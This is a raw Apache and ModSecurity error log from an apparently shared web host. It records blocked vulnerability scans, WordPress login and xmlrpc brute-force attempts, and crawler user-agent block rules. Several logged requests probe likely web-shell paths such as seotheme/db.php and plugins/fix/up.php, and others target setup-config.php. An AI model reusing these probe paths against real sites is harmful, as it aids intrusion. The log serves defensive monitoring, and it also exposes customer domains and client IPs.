[Tue May 26 17:42:11.962585 2026] [security2:error] [pid 924957:tid 925169] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOG-Yv2AvxeXULfJdK0gAAAFI"]
[Tue May 26 17:42:12.124256 2026] [security2:error] [pid 924957:tid 925091] [client 74.249.173.207:23811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.midrivermarina.com"] [uri "/bb.php"] [unique_id "ahWOHOYv2AvxeXULfJdK5gAAAAQ"]
[Tue May 26 17:42:12.124356 2026] [security2:error] [pid 924957:tid 925091] [client 74.249.173.207:23811] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.midrivermarina.com"] [uri "/bb.php"] [unique_id "ahWOHOYv2AvxeXULfJdK5gAAAAQ"]
[Tue May 26 17:42:12.144171 2026] [autoindex:error] [pid 924957:tid 925121] [client 189.90.222.159:57156] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:12.539364 2026] [core:crit] [pid 924957:tid 925193] (13)Permission denied: [client 40.77.167.42:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:42:13.243956 2026] [core:crit] [pid 924957:tid 925120] (13)Permission denied: [client 40.77.167.42:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:42:13.915399 2026] [security2:error] [pid 924957:tid 925139] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOHeYv2AvxeXULfJdLEQAAADQ"]
[Tue May 26 17:42:14.537698 2026] [security2:error] [pid 924957:tid 925133] [client 172.98.32.28:45373] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWOHuYv2AvxeXULfJdLKQAAAC4"]
[Tue May 26 17:42:14.971577 2026] [autoindex:error] [pid 924957:tid 925090] [client 153.67.9.84:31631] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:15.724236 2026] [security2:error] [pid 924957:tid 925105] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOH-Yv2AvxeXULfJdLPwAAABI"]
[Tue May 26 17:42:16.500386 2026] [security2:error] [pid 924957:tid 925129] [client 74.7.230.2:55364] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dgcni.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOIOYv2AvxeXULfJdLWgAAKhs"]
[Tue May 26 17:42:16.567239 2026] [security2:error] [pid 924957:tid 925155] [client 74.7.228.51:45278] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dgcwestindia.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOIOYv2AvxeXULfJdLYQAARBw"]
[Tue May 26 17:42:17.051462 2026] [autoindex:error] [pid 924957:tid 925174] [client 190.43.146.102:54500] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:17.371551 2026] [security2:error] [pid 924957:tid 925111] [client 74.7.241.160:52366] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dglmmm.org.in.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOIeYv2AvxeXULfJdLcQAAGCI"]
[Tue May 26 17:42:17.814393 2026] [autoindex:error] [pid 924957:tid 924995] [remote 74.7.227.41:54400] AH01276: Cannot serve directory /home2/svijakqj/dglmmm.org.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:42:18.539725 2026] [security2:error] [pid 924957:tid 925165] [client 74.7.228.60:38810] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dgssi.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOIuYv2AvxeXULfJdLkgAATiY"]
[Tue May 26 17:42:18.600522 2026] [security2:error] [pid 924957:tid 925116] [client 74.7.228.47:60182] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.dgssi.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWOIuYv2AvxeXULfJdLlgAAHSg"]
[Tue May 26 17:42:18.637820 2026] [security2:error] [pid 924957:tid 925191] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOIuYv2AvxeXULfJdLigAAAGg"]
[Tue May 26 17:42:19.474842 2026] [security2:error] [pid 924957:tid 925019] [remote 216.73.216.30:4889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOI-Yv2AvxeXULfJdLrQAAZj0"]
[Tue May 26 17:42:20.688764 2026] [security2:error] [pid 924957:tid 925096] [client 223.235.98.214:7524] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOJOYv2AvxeXULfJdL1AAAAAk"]
[Tue May 26 17:42:20.689002 2026] [security2:error] [pid 924957:tid 925096] [client 223.235.98.214:7524] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOJOYv2AvxeXULfJdL1AAAAAk"]
[Tue May 26 17:42:21.033897 2026] [security2:error] [pid 924957:tid 925200] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOJOYv2AvxeXULfJdL0AAAAHE"]
[Tue May 26 17:42:23.066789 2026] [security2:error] [pid 924957:tid 925171] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOJuYv2AvxeXULfJdMCAAAAFQ"]
[Tue May 26 17:42:23.835399 2026] [security2:error] [pid 924957:tid 925085] [remote 109.205.180.55:41518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWOJ-Yv2AvxeXULfJdMMgAAY38"]
[Tue May 26 17:42:24.764395 2026] [security2:error] [pid 924957:tid 925044] [remote 216.73.216.30:30490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOKOYv2AvxeXULfJdMVAAAKFY"]
[Tue May 26 17:42:25.329259 2026] [security2:error] [pid 924957:tid 925144] [client 91.123.13.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWOKOYv2AvxeXULfJdMTgAAADk"]
[Tue May 26 17:42:25.713582 2026] [security2:error] [pid 924957:tid 925178] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOKeYv2AvxeXULfJdMaQAAAFs"]
[Tue May 26 17:42:27.569912 2026] [security2:error] [pid 924957:tid 925202] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOK-Yv2AvxeXULfJdMowAAAHM"]
[Tue May 26 17:42:27.874175 2026] [security2:error] [pid 924957:tid 925119] [client 5.39.1.253:20286] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahWOK-Yv2AvxeXULfJdMtAAAACA"]
[Tue May 26 17:42:27.874318 2026] [security2:error] [pid 924957:tid 925119] [client 5.39.1.253:20286] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahWOK-Yv2AvxeXULfJdMtAAAACA"]
[Tue May 26 17:42:28.652807 2026] [security2:error] [pid 924957:tid 925198] [client 157.85.210.84:22057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 84.210.85.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahWOLOYv2AvxeXULfJdMwwAAAG8"]
[Tue May 26 17:42:28.652978 2026] [security2:error] [pid 924957:tid 925198] [client 157.85.210.84:22057] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "poonawallatennisacademy.com"] [uri "/xmlrpc.php"] [unique_id "ahWOLOYv2AvxeXULfJdMwwAAAG8"]
[Tue May 26 17:42:29.243179 2026] [security2:error] [pid 924957:tid 925149] [client 54.39.0.103:41310] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "kardashevtechnologies.com"] [uri "/"] [unique_id "ahWOLeYv2AvxeXULfJdM1AAAAD4"]
[Tue May 26 17:42:29.243324 2026] [security2:error] [pid 924957:tid 925149] [client 54.39.0.103:41310] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "kardashevtechnologies.com"] [uri "/"] [unique_id "ahWOLeYv2AvxeXULfJdM1AAAAD4"]
[Tue May 26 17:42:29.591017 2026] [security2:error] [pid 924957:tid 925051] [remote 216.73.216.30:30490] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOLeYv2AvxeXULfJdM2wAADF0"]
[Tue May 26 17:42:29.891012 2026] [security2:error] [pid 924957:tid 925121] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOLeYv2AvxeXULfJdM1wAAACI"]
[Tue May 26 17:42:30.134415 2026] [security2:error] [pid 924957:tid 925055] [remote 74.7.241.58:47868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWOLuYv2AvxeXULfJdM6AAAH2E"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields/resources
[Tue May 26 17:42:31.223777 2026] [security2:error] [pid 924957:tid 925208] [client 223.235.98.214:21732] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOL-Yv2AvxeXULfJdNAQAAAHk"]
[Tue May 26 17:42:31.223907 2026] [security2:error] [pid 924957:tid 925208] [client 223.235.98.214:21732] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWOL-Yv2AvxeXULfJdNAQAAAHk"]
[Tue May 26 17:42:32.522185 2026] [security2:error] [pid 924957:tid 925137] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOMOYv2AvxeXULfJdNFwAAADI"]
[Tue May 26 17:42:34.445916 2026] [security2:error] [pid 924957:tid 925204] [client 185.191.171.3:43658] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahWOMuYv2AvxeXULfJdNSAAAAHU"]
[Tue May 26 17:42:34.446064 2026] [security2:error] [pid 924957:tid 925204] [client 185.191.171.3:43658] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-27th/list/"] [unique_id "ahWOMuYv2AvxeXULfJdNSAAAAHU"]
[Tue May 26 17:42:34.772815 2026] [core:crit] [pid 924957:tid 925188] (13)Permission denied: [client 52.167.144.23:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:42:34.857039 2026] [security2:error] [pid 924957:tid 925062] [remote 216.73.216.30:3771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWOMuYv2AvxeXULfJdNUwAAKmg"]
[Tue May 26 17:42:35.544681 2026] [security2:error] [pid 924957:tid 925153] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWOM-Yv2AvxeXULfJdNWQAAAEI"]
[Tue May 26 17:42:36.857869 2026] [security2:error] [pid 924957:tid 925205] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWONOYv2AvxeXULfJdNewAAAHY"]
[Tue May 26 17:42:37.015597 2026] [security2:error] [pid 924957:tid 925113] [client 45.92.1.17:52888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWONOYv2AvxeXULfJdNiwAAABo"], referer: www.google.com
[Tue May 26 17:42:37.019741 2026] [security2:error] [pid 924957:tid 925147] [client 45.92.1.17:52887] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-plain.php"] [unique_id "ahWONOYv2AvxeXULfJdNjgAAADw"], referer: www.google.com
[Tue May 26 17:42:37.051168 2026] [security2:error] [pid 924957:tid 925142] [client 45.92.1.17:52889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWONOYv2AvxeXULfJdNjQAAADc"]
[Tue May 26 17:42:37.148809 2026] [security2:error] [pid 924957:tid 925156] [client 75.130.93.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWONOYv2AvxeXULfJdNfwAAAEU"]
[Tue May 26 17:42:37.272200 2026] [security2:error] [pid 924957:tid 925118] [client 45.92.1.17:53037] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wwmwtfre.php"] [unique_id "ahWONeYv2AvxeXULfJdNmAAAAB8"], referer: www.google.com
[Tue May 26 17:42:37.395846 2026] [security2:error] [pid 924957:tid 925140] [client 45.92.1.17:53030] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWONeYv2AvxeXULfJdNmgAAADU"], referer: www.google.com
[Tue May 26 17:42:37.649017 2026] [security2:error] [pid 924957:tid 925175] [client 45.92.1.17:53151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-plain.php"] [unique_id "ahWONeYv2AvxeXULfJdNpAAAAFg"], referer: www.google.com
[Tue May 26 17:42:37.700335 2026] [security2:error] [pid 924957:tid 925180] [client 114.119.131.253:23237] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahWONeYv2AvxeXULfJdNpQAAAF0"], referer: http://newdental.com.co/?ucci/5892271696462109l17a/bbadag61328b.undeserver
[Tue May 26 17:42:37.896072 2026] [security2:error] [pid 924957:tid 925191] [client 45.92.1.17:52885] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWONOYv2AvxeXULfJdNjAAAAGg"], referer: www.google.com
[Tue May 26 17:42:38.022683 2026] [security2:error] [pid 924957:tid 925103] [client 45.92.1.17:53313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.1.92.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ubqgajpv.php"] [unique_id "ahWONuYv2AvxeXULfJdNsQAAABA"], referer: www.google.com
[Tue May 26 17:42:38.210335 2026] [security2:error] [pid 924957:tid 925135] [client 45.92.1.17:52885] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "obinnawrites.com"] [uri "/index.php"] [unique_id "ahWONuYv2AvxeXULfJdNswAAADA"], referer: www.google.com
[Tue May 26 17:42:38.400021 2026] [security2:error] [pid 924957:tid 925171] [client 54.205.63.235:59122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNuAAAAFQ"]
[Tue May 26 17:42:38.470271 2026] [security2:error] [pid 924957:tid 925097] [client 54.205.63.235:59336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNwgAAAAo"]
[Tue May 26 17:42:38.470613 2026] [security2:error] [pid 924957:tid 925113] [client 54.205.63.235:59341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNxgAAABo"]
[Tue May 26 17:42:38.470729 2026] [security2:error] [pid 924957:tid 925188] [client 54.205.63.235:59337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNwwAAAGU"]
[Tue May 26 17:42:38.470772 2026] [security2:error] [pid 924957:tid 925109] [client 54.205.63.235:59338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahWONuYv2AvxeXULfJdNxQAAABY"]
